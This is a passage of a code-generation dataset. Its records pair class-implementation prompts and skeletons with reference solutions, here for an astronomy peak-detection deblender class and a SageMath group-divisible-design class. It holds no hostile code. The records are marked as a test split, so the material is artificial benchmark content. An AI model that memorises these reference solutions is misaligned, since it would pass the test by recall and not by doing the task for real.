= (coordinates[:, 1], coordinates[:, 0])\n wcs = blend_batch.wcs\n ra, dec = wcs.pixel_to_world_values(x, y)\n ra *= 3600\n dec *= 3600\n catalog = Table()\n catalog['ra'], catalog['dec'] = (ra, dec)\n return DeblendExample(self.max_n_sources, catalog)\n<|end_body_1|>\n", "class_docstring": "This class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.", "class_name": "PeakLocalMax", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PeakLocalMax:\n \"\"\"This class detects centroids with `skimage.feature.peak_local_max`. 
The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\"\"\"\n\n def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None:\n \"\"\"Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\"\"\"\n <|body_0|>\n\n def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample:\n \"\"\"Performs measurement on the ii-th example from the batch.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(max_n_sources)\n self.min_distance = min_distance\n self.threshold_scale = threshold_scale\n if use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\n if use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\n self.use_mean = use_mean\n self.use_band = use_band\n<|end_body_0|>\n\n<|body_start_1|>\n blend_image = blend_batch.blend_images[ii]\n if self.use_mean:\n image = np.mean(blend_image, axis=0)\n else:\n image = blend_image[self.use_band]\n threshold = self.threshold_scale * np.std(image)\n coordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\n x, y = (coordinates[:, 1], coordinates[:, 0])\n wcs = blend_batch.wcs\n ra, dec = wcs.pixel_to_world_values(x, y)\n ra *= 3600\n dec *= 3600\n catalog = Table()\n catalog['ra'], catalog['dec'] = (ra, dec)\n return DeblendExample(self.max_n_sources, catalog)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000052", "length_bytes": 24907, "license_type": "permissive", "methods": [{"docstring": "Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.", "name": "__init__", "signature": "def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None"}, {"docstring": "Performs measurement on the ii-th example from the batch.", "name": "deblend", "signature": "def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002981", "prompt": "Implement the Python class `PeakLocalMax` described below.\n\nClass description:\nThis class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\n\nMethod signatures and docstrings:\n- def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None: Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. 
Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\n- def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample: Performs measurement on the ii-th example from the batch.", "prompted_full_text": "Implement the Python class `PeakLocalMax` described below.\n\nClass description:\nThis class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\n\nMethod signatures and docstrings:\n- def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None: Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\n- def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample: Performs measurement on the ii-th example from the batch.\n\n<|skeleton|>\nclass PeakLocalMax:\n \"\"\"This class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\"\"\"\n\n def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None:\n \"\"\"Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. 
use_band: Integer index of the band to use for the measurement.\"\"\"\n <|body_0|>\n\n def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample:\n \"\"\"Performs measurement on the ii-th example from the batch.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(max_n_sources)\n self.min_distance = min_distance\n self.threshold_scale = threshold_scale\n if use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\n if use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\n self.use_mean = use_mean\n self.use_band = use_band\n<|end_body_0|>\n\n<|body_start_1|>\n blend_image = blend_batch.blend_images[ii]\n if self.use_mean:\n image = np.mean(blend_image, axis=0)\n else:\n image = blend_image[self.use_band]\n threshold = self.threshold_scale * np.std(image)\n coordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\n x, y = (coordinates[:, 1], coordinates[:, 0])\n wcs = blend_batch.wcs\n ra, dec = wcs.pixel_to_world_values(x, y)\n ra *= 3600\n dec *= 3600\n catalog = Table()\n catalog['ra'], catalog['dec'] = (ra, dec)\n return DeblendExample(self.max_n_sources, catalog)\n<|end_body_1|>\n", "revision_id": "f5b716a373f130238100db8980aa0d282822983a", "skeleton": "<|skeleton|>\nclass PeakLocalMax:\n \"\"\"This class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\"\"\"\n\n def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None:\n \"\"\"Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\"\"\"\n <|body_0|>\n\n def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample:\n \"\"\"Performs measurement on the ii-th example from the batch.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PeakLocalMax:\n \"\"\"This class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\"\"\"\n\n def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None:\n \"\"\"Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. 
use_band: Integer index of the band to use for the measurement.\"\"\"\n super().__init__(max_n_sources)\n self.min_distance = min_distance\n self.threshold_scale = threshold_scale\n if use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\n if use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\n self.use_mean = use_mean\n self.use_band = use_band\n\n def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample:\n \"\"\"Performs measurement on the ii-th example from the batch.\"\"\"\n blend_image = blend_batch.blend_images[ii]\n if self.use_mean:\n image = np.mean(blend_image, axis=0)\n else:\n image = blend_image[self.use_band]\n threshold = self.threshold_scale * np.std(image)\n coordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\n x, y = (coordinates[:, 1], coordinates[:, 0])\n wcs = blend_batch.wcs\n ra, dec = wcs.pixel_to_world_values(x, y)\n ra *= 3600\n dec *= 3600\n catalog = Table()\n catalog['ra'], catalog['dec'] = (ra, dec)\n return DeblendExample(self.max_n_sources, catalog)\n", "source": "the_stack_v2_python_sparse", "source_path": "btk/deblend.py", "source_repo": "LSSTDESC/BlendingToolKit", "split": "test", "star_events_count": 22} {"blob_id": "1d302630b056840b480fda2d2084d23aac60171e", "bodies": ["from .designs_pyx import is_group_divisible_design\nself._lambd = lambd\nIncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\nif groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\nelif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\nelse:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\nif check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]", "if self._point_to_index is None:\n return [list(g) for g in self._groups]\nelse:\n return [[self._points[i] for i in g] for g in self._groups]", "group_sizes = [len(_) for _ in self._groups]\ngdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\ngdd_type = '.'.join(gdd_type)\nif not gdd_type:\n gdd_type = '1^0'\nv = self.num_points()\nreturn 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)"], "bodies_text": "<|body_start_0|>\n from .designs_pyx import is_group_divisible_design\n self._lambd = lambd\n IncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\n if groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\n elif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\n else:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\n if check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]\n<|end_body_0|>\n\n<|body_start_1|>\n if self._point_to_index is None:\n return [list(g) for g in self._groups]\n else:\n return [[self._points[i] for i in g] for g in self._groups]\n<|end_body_1|>\n\n<|body_start_2|>\n group_sizes = [len(_) for _ in self._groups]\n gdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\n gdd_type = '.'.join(gdd_type)\n if not gdd_type:\n gdd_type = '1^0'\n 
v = self.num_points()\n return 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)\n<|end_body_2|>\n", "class_docstring": "Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to", "class_name": "GroupDivisibleDesign", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GroupDivisibleDesign:\n \"\"\"Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\"\"\"\n\n def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds):\n \"\"\"Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_0|>\n\n def groups(self):\n \"\"\"Return the groups of the Group-Divisible Design. 
EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from .designs_pyx import is_group_divisible_design\n self._lambd = lambd\n IncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\n if groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\n elif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\n else:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\n if check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]\n<|end_body_0|>\n\n<|body_start_1|>\n if self._point_to_index is None:\n return [list(g) for g in self._groups]\n else:\n return [[self._points[i] for i in g] for g in self._groups]\n<|end_body_1|>\n\n<|body_start_2|>\n group_sizes = [len(_) for _ in self._groups]\n gdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\n gdd_type = '.'.join(gdd_type)\n if not gdd_type:\n gdd_type = '1^0'\n v = self.num_points()\n return 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000053", "length_bytes": 13086, "license_type": "no_license", "methods": [{"docstring": "Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4", "name": "__init__", "signature": "def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds)"}, {"docstring": "Return the groups of the Group-Divisible Design. 
EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [", "name": "groups", "signature": "def groups(self)"}, {"docstring": "Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4", "name": "__repr__", "signature": "def __repr__(self)"}], "n_methods": 3, "prompt": "Implement the Python class `GroupDivisibleDesign` described below.\n\nClass description:\nGroup Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\n\nMethod signatures and docstrings:\n- def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds): Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\n- def groups(self): Return the groups of the Group-Divisible Design. 
EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\n- def __repr__(self): Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4", "prompted_full_text": "Implement the Python class `GroupDivisibleDesign` described below.\n\nClass description:\nGroup Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\n\nMethod signatures and docstrings:\n- def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds): Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\n- def groups(self): Return the groups of the Group-Divisible Design. 
EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\n- def __repr__(self): Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\n\n<|skeleton|>\nclass GroupDivisibleDesign:\n \"\"\"Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\"\"\"\n\n def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds):\n \"\"\"Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_0|>\n\n def groups(self):\n \"\"\"Return the groups of the Group-Divisible Design. 
EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from .designs_pyx import is_group_divisible_design\n self._lambd = lambd\n IncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\n if groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\n elif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\n else:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\n if check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]\n<|end_body_0|>\n\n<|body_start_1|>\n if self._point_to_index is None:\n return [list(g) for g in self._groups]\n else:\n return [[self._points[i] for i in g] for g in self._groups]\n<|end_body_1|>\n\n<|body_start_2|>\n group_sizes = [len(_) for _ in self._groups]\n gdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\n gdd_type = '.'.join(gdd_type)\n if not gdd_type:\n gdd_type = '1^0'\n v = self.num_points()\n return 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)\n<|end_body_2|>\n", "revision_id": "0d9eacbf74e2acffefde93e39f8bcbec745cdaba", "skeleton": "<|skeleton|>\nclass GroupDivisibleDesign:\n \"\"\"Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. 
If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\"\"\"\n\n def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds):\n \"\"\"Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_0|>\n\n def groups(self):\n \"\"\"Return the groups of the Group-Divisible Design. EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GroupDivisibleDesign:\n \"\"\"Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. 
If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\"\"\"\n\n def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds):\n \"\"\"Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n from .designs_pyx import is_group_divisible_design\n self._lambd = lambd\n IncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\n if groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\n elif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\n else:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\n if check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]\n\n def groups(self):\n \"\"\"Return the groups of the Group-Divisible Design. EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = 